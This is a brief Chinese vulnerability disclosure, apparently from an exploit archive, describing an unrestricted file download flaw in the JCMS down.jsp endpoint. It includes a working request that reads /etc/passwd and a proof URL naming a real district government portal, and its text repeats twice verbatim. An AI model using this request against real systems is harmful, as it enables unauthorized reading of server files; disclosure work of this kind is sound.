VULHUB ™

### 简要描述： 绝对路径文件下载的问题。 ### 详细说明： 通过分析代码，某个下载功能没有限制权限，没有限制下载类型，通过设置绝对路径的参数，直接下载。 漏洞利用： jcms\m_1_9\user\down.jsp?abspathfile=/etc/passwd ### 漏洞证明： 测试代码： http://www.njgl.gov.cn/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd 鼓楼区政府门户网站： [<img src="https://images.seebug.org/upload/201403/28134323779eab8b1e748370173174ac8fd96ee2.jpg" alt="QQ截图20140328133602.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/28134323779eab8b1e748370173174ac8fd96ee2.jpg) 下载文件内容： [<img src="https://images.seebug.org/upload/201403/28134335862ee3b661d36cfb601a1a69bec36f91.jpg" alt="QQ截图20140328133642.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/28134335862ee3b661d36cfb601a1a69bec36f91.jpg)

### 简要描述： 绝对路径文件下载的问题。 ### 详细说明： 通过分析代码，某个下载功能没有限制权限，没有限制下载类型，通过设置绝对路径的参数，直接下载。 漏洞利用： jcms\m_1_9\user\down.jsp?abspathfile=/etc/passwd ### 漏洞证明： 测试代码： http://www.njgl.gov.cn/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd 鼓楼区政府门户网站： [<img src="https://images.seebug.org/upload/201403/28134323779eab8b1e748370173174ac8fd96ee2.jpg" alt="QQ截图20140328133602.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/28134323779eab8b1e748370173174ac8fd96ee2.jpg) 下载文件内容： [<img src="https://images.seebug.org/upload/201403/28134335862ee3b661d36cfb601a1a69bec36f91.jpg" alt="QQ截图20140328133642.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/28134335862ee3b661d36cfb601a1a69bec36f91.jpg)